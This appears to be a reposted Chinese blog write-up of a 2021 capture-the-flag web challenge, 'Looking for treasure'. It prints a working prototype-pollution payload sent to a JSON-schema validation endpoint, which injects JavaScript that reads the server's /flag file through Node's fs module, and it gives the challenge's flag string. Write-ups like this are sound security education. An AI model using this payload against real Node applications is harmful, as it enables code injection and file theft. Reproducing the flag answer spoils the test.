当前位置:首页 » 《休闲阅读》 » 正文

2021年“绿城杯”网络安全大赛-Web-Looking for treasure_夜白君的博客

20 人参与  2022年02月14日 14:50  分类 : 《休闲阅读》  评论

点击全文阅读


2021年“绿城杯”网络安全大赛-Web-Looking for treasure

题目名称:Looking for treasure
题目内容:从中找到宝藏题目分值:200.0
题目难度:中等
相关附件:Looking for treasure的附件6.txt

解题思路:

1.原题直接附上payload

POST /validated/json-schema/validate
Content-Type: application/json
{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}

2.拿到flag

DASCTF{443a3172111bb28cd26f6eae1a90ea1a}

在这里插入图片描述


点击全文阅读


本文链接:http://zhangshiyu.com/post/34743.html

题目  附件  解题  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 林柒薇宋延桉小说全文免费阅读穿到八零年代和司令丈夫离婚那天全文免费阅读
  • 好看的妻子嫁作他人妇,我和女儿不认小说-妻子嫁作他人妇,我和女儿不认最新章节阅读
  • 《七零:那两口子万人嫌,太发癫了》完整版-盛春香裴清远在线全文阅读
  • 最新小说被山里糙汉追着满地跑主角闵小小闵烨全文在线阅读
  • 李慕云陶金辉全文小说最新章节阅读李慕云陶金辉
  • 《看到三十年后的联姻生活,我决定离婚》颜雯程绛-小说txt全文阅读
  • 长公主她风华正茂无弹窗在线阅读
  • 你敢说话,我就敢质疑主角是李云初张景小说百度云全文完整版阅读
  • 娶资助的贫困生当晚,她和竹马一起入洞房小说(完结)-安枫符垚无删减阅读
  • 心机女插足后,她和相亲对象闪婚了(全本)姜初棠夏芝芝完整章节列表免费阅读
  • 被撞流产后,我选择离婚小说百度云完整章节列表免费阅读
  • 沈糯周钦然《老公白月光在我家别墅养胎》全章节免费阅读

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1